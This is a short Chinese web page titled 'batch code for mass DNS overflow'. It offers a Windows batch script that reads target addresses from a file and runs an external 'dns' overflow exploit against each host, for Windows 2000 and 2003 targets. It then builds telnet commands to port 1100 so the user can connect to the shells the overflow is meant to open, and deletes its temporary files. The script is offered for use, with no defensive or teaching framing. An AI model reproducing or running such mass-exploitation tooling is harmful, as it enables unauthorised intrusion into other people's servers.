DNS批量溢出批处理代码

2019-09-19 07:01:43于海丽

@echo================================================================================= 
@pause 

@ for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%dns -t2000all %%i %%j 

@for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%dns -t2003eng %%i %%j 
@goto yichu 
:yichu 
@for /F "eol=s tokens=1 delims= " %%i in (boot.txt) do echo telnet %%i 1100>>3.txt 
@for /F "eol= tokens=1 delims=" %%i in (3.txt) do echo %%i>>%%i.bat 
@del s.txt 
@del a.txt 
@del 3.txt 

@echo================================================================================= 
@echo 运行生成的批处理 等待溢出………… 
@echo================================================================================= 
@pause

相关文章 大家在看